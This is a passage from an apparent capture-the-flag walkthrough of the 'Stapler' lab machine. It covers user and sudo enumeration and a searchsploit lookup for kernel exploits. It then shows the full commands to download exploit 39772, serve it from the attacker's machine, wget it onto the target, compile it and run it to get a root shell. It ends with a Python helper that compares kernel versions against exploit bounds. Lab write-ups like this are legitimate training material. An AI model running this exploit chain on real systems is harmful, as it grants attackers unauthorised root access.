Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash
```

### 7. Sudo -l

```
SHayslett@red:/$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for SHayslett:
Sorry, user SHayslett may not run sudo on red.
```
> SHayslett has no sudo rights

### 8. Writable File

```
SHayslett@red:/$ find / -writable -type d 2>/dev/null
/var/www/https/blogblog/wp-content/uploads
/var/crash
/var/tmp
/var/spool/samba
/var/lib/php/sessions
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1005.slice/user@1005.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1005.slice/user@1005.service/init.scope
/proc/8497/task/8497/fd
/proc/8497/fd
/proc/8497/map_files
...
```
> Nothing useful here

### 9. System

```
SHayslett@red:/$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
SHayslett@red:/$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
```
(Kali)
```
┌──(chw㉿CHW)-[~/Stapler]
└─$ searchsploit Linux red 4.4
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) | linux/local/9479.c
Redis-cli < 5.0 - Buffer Overflow (PoC)                                            | linux/local/44904.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(chw㉿CHW)-[~/Stapler]
└─$ searchsploit Ubuntu 16.04
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution                   | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                      | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbn | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation          | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / C | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'lds | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps              | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary Fi | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)    | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privil | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condi | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege  | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escala | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                         | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation      | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation             | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privi | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escala | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Lo | linux/local/47169.c
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

Look at the exploits

```
┌──(chw㉿CHW)-[~/Stapler]
└─$ searchsploit -x 41923

┌──(chw㉿CHW)-[~/Stapler]
└─$ searchsploit -x 39772

┌──(chw㉿CHW)-[~/Stapler]
└─$ searchsploit -m 39772
```

### 10. exploit

```
┌──(chw㉿CHW)-[~/Stapler]
└─$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

┌──(chw㉿CHW)-[~/Stapler]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

```
SHayslett@red:/$ cd /tmp
SHayslett@red:/tmp$ wget http://192.168.45.178/39772.zip
SHayslett@red:/tmp$ unzip 39772.zip
SHayslett@red:/tmp$ cd 39772
SHayslett@red:/tmp/39772$ ls
crasher.tar  exploit.tar
SHayslett@red:/tmp/39772$ tar -vxf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
SHayslett@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/
SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x *
SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘make_setuid’:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
     .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
     .license = (__aligned_u64)""
               ^
SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
root
root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@red:/root# ls
fix-wordpress.sh  flag.txt  issue  proof.txt  wordpress.sql
```

### ✅ Get Root FLAG
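
Section 9 compares the `uname -a` output against the searchsploit titles by eye, and several of the listed entries are x86-64 builds while the box reports `i686`. Added example, not from the original writeup: a Python helper that parses the kernel release numerically and checks it against the `< X` bounds quoted in the searchsploit titles on this page, filtered by machine type. Those bounds are copied from the titles as printed above and serve only as illustrative thresholds (the authoritative fixed versions are in the vendor's security notices); the point the code makes for patch-level auditing is that the Ubuntu ABI number after the dash must be compared as an integer, because as strings `4.4.0-21` sorts after `4.4.0-116`.

```python
import re

# The uname -a line quoted in section 9 of this writeup.
PAGE_UNAME = ("Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 "
              "i686 athlon i686 GNU/Linux")

# (path as printed in the searchsploit table above, the "< X" bound quoted in its
# title, machine type the build targets or None for any). Illustrative thresholds
# only; the real fixed-in versions live in the vendor's security notices.
PAGE_BOUNDS = [
    ("linux/local/44298.c", "4.4.0-116", None),
    ("linux/local/43418.c", "4.4.0-83", None),
    ("windows_x86-64/local/47170.c", "4.4.0-51", "x86_64"),
    ("linux_x86-64/local/44300.c", "4.4.0-21", "x86_64"),
]

RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)(?:-[A-Za-z].*)?$")


def parse_release(release):
    """'4.4.0-21-generic' -> (4, 4, 0, 21).
    The number after the dash is Ubuntu's ABI revision; it is the field that
    distinguishes patched builds, so it is parsed to an int and compared as one."""
    m = RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(g) for g in m.groups())


def release_from_uname(uname_a):
    """The third field of `uname -a` is the kernel release."""
    parts = uname_a.split()
    if len(parts) < 7:
        raise ValueError("unexpected uname -a output")
    return parts[2]


def machine_from_uname(uname_a):
    """`uname -a` ends with machine, processor, hardware-platform and OS; the
    kernel-version field before them contains spaces, so count from the end."""
    parts = uname_a.split()
    if len(parts) < 7:
        raise ValueError("unexpected uname -a output")
    return parts[-4]


def below_bounds(uname_a, bounds=PAGE_BOUNDS):
    """Return the paths whose quoted bound the running kernel is still below,
    skipping entries built for a different machine type."""
    running = parse_release(release_from_uname(uname_a))
    machine = machine_from_uname(uname_a)
    hits = [path for path, bound, arch in bounds
            if (arch is None or arch == machine) and running < parse_release(bound)]
    return sorted(hits)


if __name__ == "__main__":
    print(release_from_uname(PAGE_UNAME), machine_from_uname(PAGE_UNAME))
    print(below_bounds(PAGE_UNAME))
```

For the quoted `uname -a`, the two x86-64 entries drop out on the `i686` machine and the `4.4.0-21` bound is not below itself, which leaves the two architecture-independent entries; the same comparison done on the raw strings would have reported `4.4.0-21` as newer than `4.4.0-116`.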